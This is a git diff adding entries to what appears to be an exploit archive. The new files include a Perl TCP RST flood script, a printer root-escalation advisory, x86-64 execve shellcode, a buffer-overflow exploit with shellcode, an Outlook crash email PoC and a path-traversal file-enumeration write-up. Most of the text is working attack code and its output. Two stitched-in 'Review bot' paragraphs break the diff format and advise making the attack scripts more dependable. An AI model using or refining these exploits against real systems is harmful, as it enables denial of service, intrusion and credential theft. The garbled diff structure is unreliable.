diff --git a/files.csv b/files.csv
index 88591ad973..df853665a6 100644
--- a/files.csv
+++ b/files.csv
@@ -5430,6 +5430,9 @@ id,file,description,date,author,platform,type,port
 41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0
 41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0
 41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0
+41752,platforms/hardware/dos/41752.pl,"MikroTik RouterBoard 6.38.5 - Denial of Service",2017-03-28,FarazPajohan,hardware,dos,0
+41755,platforms/windows/dos/41755.py,"VX Search Enterprise 9.5.12 - 'Verify Email' Buffer Overflow",2017-03-28,ScrR1pTK1dd13,windows,dos,0
+41756,platforms/windows/dos/41756.txt,"Microsoft Outlook - HTML Email Denial of Service",2017-03-28,"Haifei Li",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8893,6 +8896,7 @@ id,file,description,date,author,platform,type,port
 41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
 41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
 41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
+41754,platforms/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",hardware,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15399,6 +15403,7 @@ id,file,description,date,author,platform,type,port
 41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
 41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
 41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
+41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16029,6 +16034,7 @@ id,file,description,date,author,platform,type,port
 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
+41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
diff --git a/platforms/hardware/dos/41752.pl b/platforms/hardware/dos/41752.pl
new file mode 100755
index 0000000000..16dce410fd
--- /dev/null
+++ b/platforms/hardware/dos/41752.pl
@@ -0,0 +1,106 @@
+#!/usr/local/bin/perl
+
+use Socket;
+
+$src_host =3D $ARGV[0];=20
+$src_port =3D $ARGV[1];=20
+$dst_host =3D $ARGV[2];=20
+$dst_port =3D $ARGV[3];=20
+
+if(!defined $src_host or !defined $src_port or !defined $dst_host or !defin=
+ed $dst_port)=20
+{
+=09
+=09print "Usage: $0 \n";
+=09exit;
+}=20
+else=20
+{
+=09
+=09main();
+}
+=20
+sub main=20
+{
+=09my $src_host =3D (gethostbyname($src_host))[4];
+=09my $dst_host =3D (gethostbyname($dst_host))[4];
+=09$IPROTO_RAW =3D 255;
+=09socket($sock , AF_INET, SOCK_RAW, $IPROTO_RAW)=20
+=09=09or die $!;
+=09my ($packet) =3D makeheaders($src_host, $src_port, $dst_host, $dst_port)=
+;
+=09my ($destination) =3D pack('Sna4x8', AF_INET, $dst_port, $dst_host);
+=09while(1)
+=09{
+=09=09send($sock , $packet , 0 , $destination)
+=09=09=09or die $!;
+=09}
+}
+
+sub makeheaders=20
+{
+=09$IPPROTO_TCP =3D 6;
+=09local($src_host , $src_port , $dst_host , $dst_port) =3D @_;
+=09my $zero_cksum =3D 0;
+=09my $tcp_len =3D 20;
+=09my $seq =3D 19456;
+=09my $seq_ack =3D 0;
+=09my $tcp_doff =3D "5";
+=09my $tcp_res =3D 0;
+=09my $tcp_doff_res =3D $tcp_doff . $tcp_res;
+=09my $tcp_urg =3D 0;=20
+=09my $tcp_ack =3D 0;
+=09my $tcp_psh =3D 0;
+=09my $tcp_rst =3D 1;
+=09my $tcp_syn =3D 0;
+=09my $tcp_fin =3D 0;
+=09my $null =3D 0;
+=09my $tcp_win =3D 124;
+=09my $tcp_urg_ptr =3D 44;
+=09my $tcp_flags =3D $null . $null . $tcp_urg . $tcp_ack . $tcp_psh . $tcp_=
+rst . $tcp_syn . $tcp_fin ;
+=09my $tcp_check =3D 0;
+=09my $tcp_header =3D pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $s=
+eq_ack , $tcp_doff_res, $tcp_flags, $tcp_win , $tcp_check, $tcp_urg_ptr);
+=09my $tcp_pseudo =3D pack('a4a4CCn' , $src_host, $dst_host, 0, $IPPROTO_TC=
+P, length($tcp_header) ) . $tcp_header;
+=09$tcp_check =3D &checksum($tcp_pseudo);
+=09my $tcp_header =3D pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $s=
+eq_ack , $tcp_doff_res, $tcp_flags, $tcp_win , $tcp_check, $tcp_urg_ptr);
+=09my $ip_ver =3D 4;
+=09my $ip_len =3D 5;
+=09my $ip_ver_len =3D $ip_ver . $ip_len;
+=09my $ip_tos =3D 00;
+=09my $ip_tot_len =3D $tcp_len + 20;
+=09my $ip_frag_id =3D 19245;
+=09my $ip_ttl =3D 25;
+=09my $ip_proto =3D $IPPROTO_TCP;=09
+=09my $ip_frag_flag =3D "010";
+=09my $ip_frag_oset =3D "0000000000000";
+=09my $ip_fl_fr =3D $ip_frag_flag . $ip_frag_oset;
+=09my $ip_header =3D pack('H2CnnB16CCna4a4',=09$ip_ver_len, $ip_tos, $ip_to=
+t_len, $ip_frag_id,=09$ip_fl_fr , $ip_ttl , $ip_proto , $zero_cksum , $src_=
+host , $dst_host);
+=09my $pkt =3D $ip_header . $tcp_header;
+=09return $pkt;
+}
+sub checksum=20
+{
+=09my ($msg) =3D @_;
+=09my ($len_msg,$num_short,$short,$chk);
+=09$len_msg =3D length($msg);
+=09$num_short =3D $len_msg / 2;
+=09$chk =3D 0;
+=09
+=09foreach $short (unpack("S$num_short", $msg))=20
+=09{
+=09=09$chk +=3D $short;
+=09}
+=09
+=09$chk +=3D unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2;
+=09$chk =3D ($chk >> 16) + ($chk & 0xffff);
+=09
+=09return(~(($chk >> 16) + $chk) & 0xffff);
+}=20
+
+
diff --git a/platforms/hardware/local/41754.txt b/platforms/hardware/local/41754.txt
new file mode 100755
index 0000000000..a3b8d1a597
--- /dev/null
+++ b/platforms/hardware/local/41754.txt
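Review bot: The two gethostbyname() calls at the top of main() are unchecked: on a failed lookup the list is empty, `(gethostbyname($src_host))[4]` yields undef, and the packed headers silently carry zero addresses because the file runs without `use strict; use warnings;` (those belong right after the `#!` line, after which `$sock`, `$IPROTO_RAW` and `$IPPROTO_TCP` need `my`/`our` declarations). Add `or die "cannot resolve $src_host: $!"` and the same for `$dst_host` so a mistyped argument is reported rather than acted on. The usage text `print "Usage: $0 \n";` names none of the four positional arguments; `print "Usage: $0 src_host src_port dst_host dst_port\n";` documents the interface the `if(!defined ...)` guard checks. The sockaddr built by hand with `pack('Sna4x8', AF_INET, $dst_port, $dst_host)` uses a native-endian `S` for the family field; `pack_sockaddr_in($dst_port, $dst_host)`, which the `use Socket;` line already exports, is the portable spelling and also drops the `&checksum(...)` call style in favour of `checksum(...)`.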
@@ -0,0 +1,140 @@
+# TITLE: Intermec Industrial Printers Local root with Busybox jailbreak
+
+# Date: March 28th, 2017
+# Author: Bourbon Jean-marie (kmkz) from AKERVA company | @kmkz_security
+
+# Product Homepage:
+ http://www.intermec.com/products/prtrpm43a/
+
+# Firmware download:
+ http://www.intermec.com/products/prtrpm43a/downloads.aspx
+
+# Tested on :
+ model: PM43 RFID Industrial printer
+ firmware version: 10.10.011406
+ kernel: Linux PM43-xxxxxxx 2.6.31 #1 PREEMPT Mon Oct 26 10:49:59 SGT 2015 armv5tejl GNU/Linux
+
+# CVSS: 7.5 (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H)
+# OVE ID: OVE-20170131-0001
+# CVE ID: CVE-2017-5671
+# OSVDB ID: n/a
+
+# Thanks:
+ Dany Bach (Rioru) from AKERVA company for the exploitation design during the pentest during which the CVE-2017-5671 was discovered | @DDXhunter
+ Honeywell team which was really reactive (with special thanks to Kevin Staggs) !
+
+# Credits:
+ The security notification that Intermec (Honeywell) sent to all of their dealers:
+ https://github.com/kmkz/exploit/blob/master/CVE-2017-5671-Credits.pdf
+
+# Additional ressource:
+ https://akerva.com/blog/intermec-industrial-printers-local-root-with-busybox-jailbreak/
+
+# Affected products:
+ PM23, PM42, PM43, PC23, PC43, PD43 and PC42 printers with versions prior to March 2017
+
+# Fixes:
+ Download the new firmware version by using the link below:
+ http://epsfiles.intermec.com/eps_files/eps_download/Firmware_P10.11.013310.zip
+
+# Release note:
+ http://apps.intermec.com/downloads/eps_download/Firmware%20Release%20Notes%20x10_11_013310.pdf
+
+
+Intermec (Honeywell) Industrial RFID Printers Local root privilege escalation with Busybox jailbreak
+
+I. PRODUCT
+
+PM43/PM43c mid-range industrial RFID printers are ideal for a wide range of applications within the distribution center / warehouse and manufacturing environments.
+
+II. ADVISORY
+
+Using a bad file permission, it is possible to gain full root privilege on a PM43 industrial printer as well as from the admin account than it-admin which are the two default users on the machine.
+It also permits to gain full privilege resulting on a Busybox jailbreak due to the root access on the system.
+The impact of this exploitation is quite critical due to the sensitive information that are available and impact the recent firmware version release (before March 12th 2017).
+
+III. VULNERABILITY DESCRIPTION
+
+The Lua binary rights are too permissive and this one is SUID which conduct to perform this privilege escalation using a basic trick as describe in the next section.
+The default it-admin and/or admin credentials are available in the vendor's documentation and should be modified too.
+
+IV. PROOF OF CONCEPT
+
+Following steps can reproduce the privilege escalation once the attacker gain a Busybox shell on the system:
+
+itadmin@PM43-XXXXXXXXXXX /tmp$ find / -perm -g=s -type f 2>/dev/null
+/bin/busybox
+/usr/bin/cfg
+/usr/bin/lua <----- Lua binary with SUID perm.
+/usr/bin/httpd_restore
+/usr/bin/ikev2
+/usr/bin/pwauth
+/usr/bin/functest
+/usr/bin/imecutil
+/usr/bin/httpd_fwupgrade
+/usr/sbin/setkey
+
+We then try to execute a shell command using Lua but it seems that this one is executed with non-root privileges through the Busybox shell:
+
+itadmin@PM43-XXXXXXXXXXX /tmp$ /usr/bin/lua
+Lua 5.1.4 Copyright (C) 1994-2008 Lua.org, PUC-Rio
+> os.execute("id")
+uid=1(itadmin) gid=1(itadmin) groups=1(itadmin),2(admin),3(user)
+
+So we identify that it is possible to read/write files with root privilege on the file system without any restrictions (we will be able to modify the shadow file in order to log in as root later):
+
+// in the Lua interpreter:
+
+> f=io.open("/etc/shadow","rb")
+> print(f)
+file (0x17af0)
+> c=f:read "*a"
+> print(c)
+root:!$1$XPCuiq25$IvWw/kKeomOyQIee8XfTb1:11851:0:99999:7:::
+admin:$1$Ma/qTlIw$PPPTgRVCnkqcDQxjMBtsC0:11851:0:99999:7:::
+itadmin:$1$kcHXJUjT$OIgLfTDgaEAlTbHRZFPsj.:11851:0:99999:7:::
+user::11851:0:99999:7:::
+ftp:*:11851:0:99999:7:::
+nobody:*:11851:0:99999:7:::
+lighttpd:x:1000:1000:Linux User,,,:/home/lighttpd:/bin/sh
+
+We conclude this "proof of concept" by writing a file on the filesystem which demonstrate the possibilities that we now have using this kind of code:
+
+fp = io.popen("akerva", "w")
+fp:write(anything)
+fp:close()
+
+That gave us the following output:
+
+itadmin@PM43-XXXXXXXXXXX /tmp$ cat akerva
+AKERVA r00t
+itadmin@PM43-XXXXXXXXXXX /tmp$ ls -alsh akerva
+ 4 -rw-rw-r-- 1 root root 12 Jan 25 07:12 akerva
+
+As explained in the above text, we then over-writed the "etc/shadow" file and we validated that it is possible to gain full root access on the filesystem even if Busybox 1.15.0 (2009 release) were present, bypassing
+its shell restrictions (jailbreaking it).
+
+V. RECOMMENDATIONS
+
+AKERVA's Pentesters recommended to fix it by modifying the Lua binary rights (is the SUID bit necessary?) which was done in the patched firmware.
+A security fix is now available in order to mitigate this issue as shown at the beginning of this advisory.
+
+VI. VERSIONS AFFECTED
+
+This issue affects the firmware version 10.10.011406 but after reading the latest release notes it also seems to impact all versions that were released before the updated firmware.
+
+VII. TIMELINE
+
+January 19th, 2017: Vulnerability identification
+January 27th, 2017: First contact with the editor (Honeywell)
+January 31th, 2017: Advisory submission to Honeywell security team and CVE id request
+February 1st, 2017: CVE id attributed by MITRE even if the vendor is not normally considered a priority for CVE by MITRE
+February 6th, 2017: Vendor confirm the vulnerability
+February 16th, 2017: Vendor inform that the fix is ready (They also proposed me to test it prior to release)
+March 12th, 2017: New firmware version available
+March 28th, 2017: Public advisory released
+
+VIII. LEGAL NOTICES
+
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+I accept no responsibility for any damage caused by the use or misuse of this advisory.
diff --git a/platforms/lin_x86-64/shellcode/41750.txt b/platforms/lin_x86-64/shellcode/41750.txt
new file mode 100755
index 0000000000..ed00318fd5
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/41750.txt
@@ -0,0 +1,63 @@
+;================================================================================
+; The MIT License
+;
+; Copyright (c)
+;
+; Permission is hereby granted, free of charge, to any person obtaining a copy
+; of this software and associated documentation files (the "Software"), to deal
+; in the Software without restriction, including without limitation the rights
+; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+; copies of the Software, and to permit persons to whom the Software is
+; furnished to do so, subject to the following conditions:
+;
+; The above copyright notice and this permission notice shall be included in
+; all copies or substantial portions of the Software.
+;
+; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+; THE SOFTWARE.
+;================================================================================
+; Name : Linux/x86-64 - execve("/bin/sh") 21 Bytes
+; Author : WangYihang
+; Email : wangyihanger@gmail.com
+; Tested on: Linux_x86-64
+;================================================================================
+; Shellcode (c array) :
+char shellcode[] = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69"
+ "\x6e\x2f\x2f\x73\x68\x57\x48\x89"
+ "\xe7\xb0\x3b\x0f\x05";
+;================================================================================
+; Shellcode (python) :
+shellcode = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
+;================================================================================
+; objdump -d ./shellcode
+shellcode: file format elf64-x86-64
+Disassembly of section .text:
+0000000000400080 <_start>:
+ 400080: f7 e6 mul %esi
+ 400082: 50 push %rax
+ 400083: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi
+ 40008a: 2f 73 68
+ 40008d: 57 push %rdi
+ 40008e: 48 89 e7 mov %rsp,%rdi
+ 400091: b0 3b mov $0x3b,%al
+ 400093: 0f 05 syscall
+;================================================================================
+; Assembly language code :
+; You can asm it by using :
+; nasm -f elf64 ./shellcode.asm
+; ld -o shellcode shellcode.o
+global _start
+ _start:
+ mul esi
+ push rax
+ mov rdi, "/bin//sh"
+ push rdi
+ mov rdi, rsp
+ mov al, 59
+ syscall
+;================================================================================
\ No newline at end of file
diff --git a/platforms/windows/dos/41755.py b/platforms/windows/dos/41755.py
new file mode 100755
index 0000000000..4c18c9b205
--- /dev/null
+++ b/platforms/windows/dos/41755.py
@@ -0,0 +1,58 @@
+author = '''
+
+ ##############################################
+ # Created: ScrR1pTK1dd13 #
+ # Name: Greg Priest #
+ # Mail: ScR1pTK1dd13.slammer@gmail.com #
+ ##############################################
+
+# Exploit Title: VX Search Enterprise v9.5.12 email verify exploit
+# Date: 2017.03.28
+# Exploit Author: Greg Priest
+# Version: VX Search Enterprise v9.5.12
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+
+import socket
+
+port = 25
+s = socket.socket()
+ip = '127.0.0.1'
+s.bind((ip, port))
+s.listen(5)
+
+overflow = "A" * 256
+eip = "\x7A\xB7\x1B\x65"
+# Search NO ASLR with mona.py
+#"\x94\x21\x1C\x65" NO ASLR QtGui4.dll
+#"\x7A\xB7\x1B\x65" NO ASLR QtGui4.dll
+#"\x09\xc9\x1D\x65" NO ASLR QtGui4.dll
+nop = "\x90" * 12
+#calc.exe
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+exploit = overflow+eip+nop+shellcode
+
+print "Listening on port:", port
+
+while True:
+ conn, addr = s.accept()
+ conn.send(exploit+'\r\n')
+ conn.close()
+ print ""
+ print "Succesfully exploitation!"
diff --git a/platforms/windows/dos/41756.txt b/platforms/windows/dos/41756.txt
new file mode 100755
index 0000000000..6dedbb2990
--- /dev/null
+++ b/platforms/windows/dos/41756.txt
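Review bot: The `print "Succesfully exploitation!"` at the end of the accept loop is unconditional: the return value of `conn.send(exploit+'\r\n')` is discarded, so a partial write is never noticed, and closing the connection says nothing about what the peer did with the bytes. Use `conn.sendall(exploit+'\r\n')` so the whole buffer is written or an exception is raised, and word the message as what the script actually knows, e.g. `print "Payload sent to", addr` (which also fixes the spelling). The `print` statements without parentheses make this Python 2 only; the header block lists the tested OS but not the interpreter version, so add `# Python 2.x` there. The listener is bound to `'127.0.0.1'`, which the "Listening on port" message does not mention — `print "Listening on %s:%d" % (ip, port)` is less misleading.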
@@ -0,0 +1,94 @@ +Source: https://justhaifei1.blogspot.ca/2017/03/an-interesting-outlook-bug.html + +When you send this email to someone, when he/she *just read* the email, Outlook will crash. MSRC told me that they think it's a non-exploitable bug and it seems that they are not going to fix it in near future, I'm releasing the details in this quick write-up, and hopefully, for an "old pedant" style open discussion about the exploitability as I still have some doubts.:-) + +The PoC could be as simple as the following, or you may download the .eml file below. + +Content-Type: multipart/alternative; boundary="===============111111111111== +MIME-Version: 1.0 +Subject: title +From: aa@msft.com +To: bb@msft.com + +--===============111111111111== +Content-Type: text/plain; charset="us-ascii" +MIME-Version: 1.0 +Content-Transfer-Encoding: 7bit + +plain text area +--===============111111111111== +Content-Type: text/html; charset="us-ascii" +MIME-Version: 1.0 + + + + + + +
+e +
+
+ + + +
+
+
+e +
+ + + +--===============111111111111==-- + + +If you do some tests based on the PoC you will quickly figure out that the CSS code "" is something important here. For example, if we remove this line, Outlook won't crash. This also suggests that the bug is related to some "CSS rendering" code in Outlook. + + +The Crash + +The following crash should be observed on Office 2010 14.0.7177.5000, full updated as of March 21, 2017. In fact, I believe it affects all Outlook versions. + +(384.400): Access violation - code c0000005 (!!! second chance !!!) +eax=0020f580 ebx=0ea72288 ecx=00000000 edx=00000000 esi=191cdfd0 edi=5d064400 +eip=5c5e17e5 esp=0020f56c ebp=0020f754 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +wwlib!DllGetLCID+0x25b35f: +5c5e17e5 f781e402000000040000 test dword ptr [ecx+2E4h],400h ds:0023:000002e4=???????? +0:000> k +ChildEBP RetAddr +WARNING: Stack unwind information not available. Following frames may be wrong. +0020f754 5c5a2b93 wwlib!DllGetLCID+0x25b35f +0020f774 5c1d80de wwlib!DllGetLCID+0x21c70d +0020f794 5c1d801b wwlib!GetAllocCounters+0x51906 +0020f818 5c1d5c33 wwlib!GetAllocCounters+0x51843 +0020f82c 5c26d803 wwlib!GetAllocCounters+0x4f45b +0020f83c 2f63f1b6 wwlib!GetAllocCounters+0xe702b +0020f880 2f63f06b outlook!GetMsoInst+0x32e2 +0020f8a8 2ffb9d6b outlook!GetMsoInst+0x3197 +0020f938 76b0ef1c outlook!PushSavedKeyToCicero+0x291d8 +0020f944 7733367a kernel32!BaseThreadInitThunk+0xe +0020f984 7733364d ntdll!__RtlUserThreadStart+0x70 +0020f99c 00000000 ntdll!_RtlUserThreadStart+0x1b + +It crashes at the following address: + +.text:31B417D2 loc_31B417D2: ; CODE XREF: sub_31714D18+42CB1Ej +.text:31B417D2 lea eax, [ebp+var_1DC] +.text:31B417D8 push eax +.text:31B417D9 push [ebp+var_4] +.text:31B417DC push ebx +.text:31B417DD call sub_3177CE19 ;memory data at eax will be updated +.text:31B417E2 mov ecx, [eax+48h] ;read the pointer at offset 0x48 +.text:31B417E5 test dword ptr [ecx+2E4h], 400h ;crash + 
+ +Since the data pointed by EAX (@31B417E2) will be updated in function "sub_3177CE19", I did some debugging in that function, and it seems that: +There seems to be a custom heap allocator, as I've seen heap block headers, and links. +The "sub_3177CE19" does the job locating the data based on the 1st param (a pointer) and 2nd param (always be 0), and the data will be copied to the heap block pointed by the 3nd param. +According to my tests, the copied bytes are always 0x00, so that's why it seems to be a null pointer dereference bug. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41756.zip \ No newline at end of file diff --git a/platforms/windows/remote/41751.txt b/platforms/windows/remote/41751.txt new file mode 100755 index 0000000000..d7de8613ff --- /dev/null +++ b/platforms/windows/remote/41751.txt 
@@ -0,0 +1,264 @@ +[+] Credits: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DZSOFT-v4.2.7-PHP-EDITOR-FILE-ENUMERATION.txt +[+] ISR: ApparitionSec + + + +Vendor: +============== +www.dzsoft.com + + + +Product: +========================= +DzSoft PHP Editor v4.2.7 + +DzSoft PHP Editor is a tool for writing and testing PHP and HTML pages. + + + +Vulnerability Type: +==================== +File Enumeration + + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ +DzSoft comes with a built-in web server used to preview PHP files, the built-in web server is prone to file enumeration +attacks when combining "HEAD" method HTTP requests with directory traversal "\../../" type attacks. This can aid attackers +in information gathering (File enumeration) to help in possibly furthering attacks. + +On install DzSoft users get Windows network warning like: + +"Allow Dzsoft to communicate on these networks:" + +Private networks, such as my home or work network + +Public networks, such as those in airports and coffee shops (not recommended). + +This selection will create Firewall rule and determine remote connections allowed to DzSoft editors built-in server. +Then when remote user make HTTP request to DzSoft they will get HTTP 403 Forbidden from the built-in web server. + +e.g. + +curl -v "http://VICTIM-IP/\../mysql/data/mysql.pid" + + +< HTTP/1.1 403 Forbidden +< Content-Type: text/html +< Content-Length: 1554 +< + + + 403 Forbidden + + + + + + + + + + + + +

Forbidden

+

For security reasons, you cannot access the built-in web server of DzSoft PHP Editor from another computer.

+

If you see this message within DzSoft PHP Editor's window, or if you think that there might be reasons to enable access from other computers, + + +* Connection #0 to host x.x.x.x left intact + + + +However, this 403 Forbidden access control can be bypassed by malicious users to "stat" files in and outside the webroot. + +e.g. mysql directory. + +File enumeration Conditions: + +These setting is found under Run / Run Options / Paramaters tab + +a) DZSoft built-in web server is running +b) DZSoft built-in web servers "REMOTE_HOST=x.x.x.x" and "REMOTE_ADDR=x.x.x.x" is set to a real IP other than localhost. + +For POC create and save a PHP file under XAMPP/htdocs and run DzSoft built-in web server in preview mode. + +Next make request for "mysql/my-huge.ini" to see if exists. + + +C:\>curl -v -I "http://VICTIM-IP/\../mysql/my-huge.ini" +* Trying VICTIM-IP... +* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) +> HEAD /\../mysql/my-huge.ini HTTP/1.1 +> User-Agent: curl/7.41.0 +> Host: VICTIM-IP +> Accept: */* +> +< HTTP/1.1 200 OK +HTTP/1.1 200 OK +< Content-Type: +Content-Type: +< Content-Length: 5057 +Content-Length: 5057 +< Cache-Control: no-cache +Cache-Control: no-cache + + +Checking for "mysql.pid" +///////////////////////// + + +C:\>curl -v -I "http://VICTIM-IP/\../mysql/data/mysql.pid" +* Trying VICTIM-IP... +* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) +> HEAD /\../mysql/data/mysql.pid HTTP/1.1 +> User-Agent: curl/7.41.0 +> Host: VICTIM-IP +> Accept: */* +> +< HTTP/1.1 200 OK +HTTP/1.1 200 OK +< Content-Type: +Content-Type: +< Content-Length: 5 +Content-Length: 5 +< Cache-Control: no-cache +Cache-Control: no-cache +< Expires: 0 + + +Checking for "xampp_shell.bat" +/////////////////////////////// + +C:\>curl -v -I "http://VICTIM-IP/\../xampp_shell.bat" +* Trying VICTIM-IP... 
+* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) +> HEAD /\../xampp_shell.bat HTTP/1.1 +> User-Agent: curl/7.41.0 +> Host: VICTIM-IP +> Accept: */* +> +< HTTP/1.1 200 OK +HTTP/1.1 200 OK +< Content-Type: +Content-Type: +< Content-Length: 1084 +Content-Length: 1084 +< Cache-Control: no-cache + + +These also work... + + +[root@localhost local]# wget -S --spider "http://VICTIM-IP:8080/\../mysql/my-huge.ini" +--10:26:21-- http://VICTIM-IP:8080/%5C../mysql/my-huge.ini +Connecting to VICTIM-IP:8080... connected. +HTTP request sent, awaiting response... + HTTP/1.0 200 OK + Content-Type: + Content-Length: 5057 + Cache-Control: no-cache + Expires: 0 +Length: 5057 (4.9K) [] +200 OK + + +[root@localhost local]# wget -S --spider "http://VICTIM-IP:8080/\../mysql/my-innodb-heavy-4G.ini" +--10:29:03-- http://VICTIM-IP:8080/%5C../mysql/my-innodb-heavy-4G.ini +Connecting to VICTIM-IP:8080... connected. +HTTP request sent, awaiting response... + HTTP/1.0 200 OK + Content-Type: + Content-Length: 20906 + Cache-Control: no-cache + Expires: 0 +Length: 20906 (20K) [] +200 OK + + +Tested Windows XAMPP, Linux / curl +curl 7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 + + +////////////////////////////////////////// + +Next, target files on C:\ Drive. + +Bypass 401 Forbidden to enumerate a file on C:\ drive named "hi.txt" +wget "http://127.0.0.1:8088/c/hi.txt" -c --header="Range: bytes=0" + + + +Exploit/POC: +============= +In DZSoft PHP Editor + +1) Change DzSoft web server options for remote address to IP other than localhost. +2) Create test PHP file deploy under xampp/htdocs or whatever Apache your using. 
